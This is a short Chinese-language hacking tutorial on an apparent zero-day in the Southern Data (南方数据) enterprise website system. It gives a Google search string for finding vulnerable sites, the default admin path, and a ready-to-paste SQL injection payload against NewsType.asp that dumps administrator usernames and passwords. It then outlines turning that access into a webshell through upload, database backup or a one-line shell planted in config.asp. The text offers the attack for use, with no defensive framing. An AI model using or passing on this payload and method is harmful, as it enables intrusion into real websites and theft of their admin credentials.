南方数据企业0day漏洞爆后台密码

南方数据的漏洞比较多各种版本的漏洞也显而易见。
这里要讲的是南方数据企业0day直接爆后台密码方法。
南方数据企业0day漏洞爆后台密码
谷歌搜索：inurl:”HomeMarket.asp”
默认后台地址：/admin
直接在网址后面加上利用代码即可直接爆出管理员的帐号密码
利用代码：

NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='

爆出帐号密码后直接解密就可以获得管理员的帐号密码。然后在进一步的拿webshell
1、注册用户上传拿shell，这个比较直接，可以不进后台和在不知道用户名密码的情况下。
2、进后台备份数据库
3、在网站配置的版权信息里插入一句话，一句话地址写入到 http://www.xxx.com/inc/config.asp
这里只讲常见的几种，具体还是要看实际过程而定。